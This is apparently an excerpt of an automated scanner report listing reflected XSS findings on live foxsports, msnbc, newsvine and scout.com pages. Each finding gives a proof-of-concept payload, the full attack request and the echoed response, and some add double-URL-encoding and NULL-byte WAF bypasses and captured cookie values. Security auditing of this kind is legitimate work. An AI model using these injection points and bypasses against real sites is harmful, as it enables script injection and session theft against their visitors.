HTTP/1.1 200 OK Cache-Control: no-cache Date: Sun, 30 Jan 2011 15:08:48 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-FRAME-OPTIONS: DENY X-Content-Type-Options: nosniff Vary: Accept-Encoding Content-Length: 25001
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <meta http-e ...[SNIP]... <input id="symbol" value="INDU22B72";ALERT(1)//2BADDE9CEF514E81 STYLE=X:EXPRESSION(ALERT(1)) 9197DF0CD41" class="textctrl" maxlength="100" size="15" name="symbol" onfocus="if(this.value=='Name or symbol(s)')this.value=''" onblur="if('Name or symbol(s)'.length > ...[SNIP]...
5.203. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/cbk/story/Baylor-70-Colorado-66-30467175
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c9c'-alert(1)-'b3d666f6c9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cbk/story/Baylor-70-Colorado-66-30467175?f9c9c'-alert(1)-'b3d666f6c9a=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 248865 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=12 Date: Sat, 29 Jan 2011 23:50:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26409015'); // load up team comments </script> ...[SNIP]...
5.204. http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc5cb'-alert(1)-'e2af03ab728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420?fc5cb'-alert(1)-'e2af03ab728=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 234575 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=12 Date: Sat, 29 Jan 2011 23:50:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26394224'); // load up team comments </script> ...[SNIP]...
5.205. http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c732'-alert(1)-'3b16cbe3f75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911?4c732'-alert(1)-'3b16cbe3f75=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 237708 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=30 Date: Sat, 29 Jan 2011 23:49:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911?4c732'-alert(1)-'3b16cbe3f75=1';
startComments('StoryComments', '26401001'); // load up team comments </script> ...[SNIP]...
5.206. http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba1f5'-alert(1)-'3ac5f96b8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911?ba1f5'-alert(1)-'3ac5f96b8f8=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 223909 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=14 Date: Sat, 29 Jan 2011 23:50:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911?ba1f5'-alert(1)-'3ac5f96b8f8=1';
startComments('StoryComments', '73'); // load up team comments </script> ...[SNIP]...
5.207. http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1c3c'-alert(1)-'b04d6cae059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911?c1c3c'-alert(1)-'b04d6cae059=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 252769 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=23 Date: Sat, 29 Jan 2011 23:50:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26400099'); // load up team comments </script> ...[SNIP]...
5.208. http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55753'-alert(1)-'d132c7e23c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911?55753'-alert(1)-'d132c7e23c8=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 257888 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=25 Date: Sat, 29 Jan 2011 23:50:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26409028'); // load up team comments </script> ...[SNIP]...
5.209. http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc5ba'-alert(1)-'5fa67492e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911?cc5ba'-alert(1)-'5fa67492e89=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 259129 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=14 Date: Sat, 29 Jan 2011 23:50:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1074'-alert(1)-'88c686acbd7 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002e1074'-alert(1)-'88c686acbd7 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 249591 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=9 Date: Sat, 29 Jan 2011 23:49:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26373068'); // load up team comments </script> ...[SNIP]...
5.211. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa5f'-alert(1)-'e113a189711 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?2fa5f'-alert(1)-'e113a189711=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 249577 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=48 Date: Sat, 29 Jan 2011 23:50:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26373068'); // load up team comments </script> ...[SNIP]...
5.212. http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e8c'-alert(1)-'5e2bffdfb2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911?c0e8c'-alert(1)-'5e2bffdfb2d=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 225457 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=39 Date: Sat, 29 Jan 2011 23:50:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26406016'); // load up team comments </script> ...[SNIP]...
5.213. http://openchannel.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://openchannel.msnbc.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52854"><script>alert(1)</script>ae378974d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?52854"><script>alert(1)</script>ae378974d45=1 HTTP/1.1 Host: openchannel.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:17:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 158631
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload f4004<img%20src%3da%20onerror%3dalert(1)>4be4a2fbbcf was submitted in the path parameter. This input was echoed as f4004<img src=a onerror=alert(1)>4be4a2fbbcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 15:11:11 GMT Connection: close Content-Length: 504
5.215. http://photoblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://photoblog.msnbc.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5644"><script>alert(1)</script>059427e1b2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f5644"><script>alert(1)</script>059427e1b2e=1 HTTP/1.1 Host: photoblog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:18:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 98362
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b630a<img%20src%3da%20onerror%3dalert(1)>e5d9d58c461 was submitted in the path parameter. This input was echoed as b630a<img src=a onerror=alert(1)>e5d9d58c461 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:49:39 GMT Connection: close Content-Length: 572
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d374c%253cscript%253ealert%25281%2529%253c%252fscript%253ec34d3a5143c was submitted in the REST URL parameter 1. This input was echoed as d374c<script>alert(1)</script>c34d3a5143c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /d374c%253cscript%253ealert%25281%2529%253c%252fscript%253ec34d3a5143c HTTP/1.1 Host: polls.newsvine.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296400131698
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 15:14:16 GMT Connection: close Vary: Accept-Encoding Content-Length: 21174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]... <div class="vine-tagPage-tagLabel">d374c<script>alert(1)</script>c34d3a5143c</div> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %008759a'-alert(1)-'c462d76badf was submitted in the c parameter. This input was echoed as 8759a'-alert(1)-'c462d76badf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /a.z?s=73&p=9&c=4%008759a'-alert(1)-'c462d76badf&pid=88&yr=2011 HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:51:53 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.181 in 230 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 00:01:53 GMT Content-Type: text/html; charset=utf-8 Content-Length: 212580
<!-- An exception occurred. Described as: Incorrect syntax near '8759'.--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <h ...[SNIP]... <!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4%008759a'-alert(1)-'c462d76badf&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //--> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec18c'-alert(1)-'16d2db08aad was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a.z?s=73&p=9&c=4ec18c'-alert(1)-'16d2db08aad&pid=88&yr=2011 HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:23:06 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb6 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.186 in 269 ms Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 02:33:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 212480
<!-- An exception occurred. Described as: Incorrect syntax near 'c18c'.--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <h ...[SNIP]... <!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4ec18c'-alert(1)-'16d2db08aad&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //--> ...[SNIP]...
5.220. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://recruiting.scout.com
Path:
/a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e24fa'-alert(1)-'162422719ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a.z?s=73&p=9&c=4&pid=88&yr=2011&e24fa'-alert(1)-'162422719ee=1 HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:53:06 GMT Server: Microsoft-IIS/6.0 Server: Yesler X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.186 in 271 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 00:03:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 211715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Scout.com: Football Recruiting</title> <meta http-eq ...[SNIP]... <!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4&pid=88&e24fa'-alert(1)-'162422719ee=1&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //--> ...[SNIP]...
5.221. http://redtape.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redtape.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af369"-alert(1)-"8df14796428 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
